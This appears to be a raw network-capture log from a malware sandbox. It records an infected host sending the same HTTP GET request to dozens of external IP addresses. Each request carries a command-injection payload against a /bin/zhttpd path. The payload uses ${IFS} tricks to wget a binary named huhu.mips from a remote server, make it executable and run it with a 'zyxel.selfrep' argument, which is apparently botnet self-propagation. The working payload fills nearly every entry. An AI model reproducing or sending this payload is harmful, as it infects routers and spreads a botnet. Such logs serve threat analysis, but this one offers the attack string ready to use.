                                                Jan 29, 2024 07:07:38.115648031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1884192.168.2.235569036.69.81.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.115725994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1885192.168.2.2344658219.100.61.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.115778923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1886192.168.2.2348336141.229.111.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.115854979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1887192.168.2.2335984152.91.79.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.115935087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1888192.168.2.2343266200.225.203.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.115974903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1889192.168.2.2353176119.92.96.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.116040945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1890192.168.2.235924847.201.69.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.116096973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1891192.168.2.2359872115.95.10.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.116163015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1892192.168.2.2347674140.158.219.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.116261959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1893192.168.2.2349792125.73.19.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.116300106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1894192.168.2.2342444143.243.157.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.116374016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1895192.168.2.234447436.149.17.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.116435051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1896192.168.2.234518287.143.186.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.116499901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1897192.168.2.235951065.67.107.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.116550922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1898192.168.2.236002424.53.83.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.116605997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1899192.168.2.2341480174.158.177.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.116692066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1900192.168.2.234222437.38.76.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.116750956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1901192.168.2.2343226141.88.65.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.116811037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1902192.168.2.235309882.13.27.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.116839886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1903192.168.2.2349314126.239.190.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.116893053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1904192.168.2.2360442221.217.22.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.116952896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1905192.168.2.2333390191.227.197.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.117029905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1906192.168.2.2337496109.162.237.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.117103100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1907192.168.2.233822880.234.221.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.117158890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1908192.168.2.2339692221.187.21.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.117223024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1909192.168.2.2340392121.240.174.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.117280006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1910192.168.2.23380121.48.223.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.117357016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1911192.168.2.233716444.101.148.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.117434978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1912192.168.2.2358086148.118.61.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.117486954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1913192.168.2.233584299.125.186.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.117564917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1914192.168.2.2350196140.239.159.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.117636919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1915192.168.2.2335100219.68.233.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.117696047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1916192.168.2.235825083.254.43.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.117778063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1917192.168.2.235037467.94.237.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.117830992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1918192.168.2.2358428154.68.34.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.117883921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1919192.168.2.2349884115.27.134.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.117940903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1920192.168.2.2353052181.4.167.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.118020058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1921192.168.2.2336920151.129.112.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.118072987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1922192.168.2.2349742137.37.200.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.118130922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1923192.168.2.234769674.94.176.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.118185043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1924192.168.2.2353942162.222.53.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.118268967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1925192.168.2.2338104153.76.81.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.118308067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1926192.168.2.23371904.242.183.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.118386984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1927192.168.2.2357558148.224.133.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.118446112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1928192.168.2.235004840.193.37.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.118494987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1929192.168.2.2335578152.182.206.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.118597031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1930192.168.2.2359648156.114.193.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.118643999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1931192.168.2.2332926174.121.226.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.118705034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1932192.168.2.2338528130.240.99.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.118758917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1933192.168.2.2338148153.23.180.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.118820906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1934192.168.2.235802442.90.116.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.118871927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1935192.168.2.233564870.122.91.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.118927002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1936192.168.2.2348422104.229.239.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.119009018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1937192.168.2.2336378151.95.254.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.119071007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1938192.168.2.2338640175.144.47.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.119133949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1939192.168.2.2358096128.42.47.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.119206905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1940192.168.2.23584244.159.83.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.119249105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1941192.168.2.2359000142.88.3.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.119312048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1942192.168.2.235362846.116.166.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.119360924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1943192.168.2.235344893.93.132.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.119431973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1944192.168.2.2342288126.17.217.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.119493008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1945192.168.2.2344226213.196.202.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.119541883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1946192.168.2.233523649.76.194.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.119609118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1947192.168.2.234348471.220.180.163443
                                                TimestampBytes transferredDirectionData
